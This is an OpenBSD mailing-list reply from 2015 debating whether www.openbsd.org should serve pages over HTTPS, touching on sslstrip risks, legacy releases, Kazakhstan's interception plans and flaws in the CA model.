On 11 December 2015 at 05:37, Anthony J. Bentley <anth...@anjbe.name> wrote: > "Constantine A. Murenin" writes: >> On 8 December 2015 at 19:26, Anthony J. Bentley <anth...@anjbe.name> wrote: >> > Giancarlo Razzolini writes: >> >> One of the main benefits of the TLS wouldn't only be to render >> >> impossible for anyone to know which pages you're accessing on the site, >> >> but also the fact that we would get a little more security getting the >> >> SSH fingerprints for the anoncvs servers. Having them in clear text as >> >> they are today, isn't very secure. >> > >> > Another attack currently possible against www.openbsd.org is changing >> > the https://openbsdstore.com links to http://openbsdstore.com, and >> > running sslstrip on that. Or the PayPal links... >> >> For real! And yet another attack currently possible against >> www.openbsd.org is being able to view the web-site from any OpenBSD >> release, even the early ones that did include lynx in base >> (http://mdoc.su/OpenBSD-2.3/lynx.1), yet are surely missing not only >> TLSv1.2 (if not OpenSSL in the first place!), but the requisite CA >> entries in their corresponding cert.pem file as well (that is, if such >> file was even present). > > Why even bring up OpenBSD 2.3? Anyone running that 19 years after its > release has much bigger problems than not being able to connect to > www.openbsd.org.
Not really. It just works. And there's always time to upgrade to a newer OpenBSD release, since those continue to be served through http without any issues. > >> And if you're in Kazakhstan, it's also possible to view >> www.openbsd.org without any issues or security warnings, and will >> continue being so even after 2016-01-01 when the new telecommunication >> directive takes force. (Or was the feature to ignore invalid >> certificates already added to lynx nowadays?) > > I can't tell if you're saying it's a *good* thing that http provides no > notice that your connection is compromised. Are you serious? But http connections aren't compromised. They're just monitored passively. (And it's all public data, and, as mentioned, even with https, the hostnames would still have leaked.) Since it's impossible to do the same with https, they have to be MitM'ed. > > Look, the whole CA model comes with a lot of baggage. Let's Encrypt has > elements of a new approach but is still tied to that way of thinking. > Talking on misc@ won't make www.openbsd.org more secure. > > But you're defending telnet in 2015. No. If you look closely at what Theo has said, especially around pledge(2), telnet has more problems that just lack of encryption. Kinda like HTTPS has few-too-many downfalls and bad policies other than the availability of encryption. C.
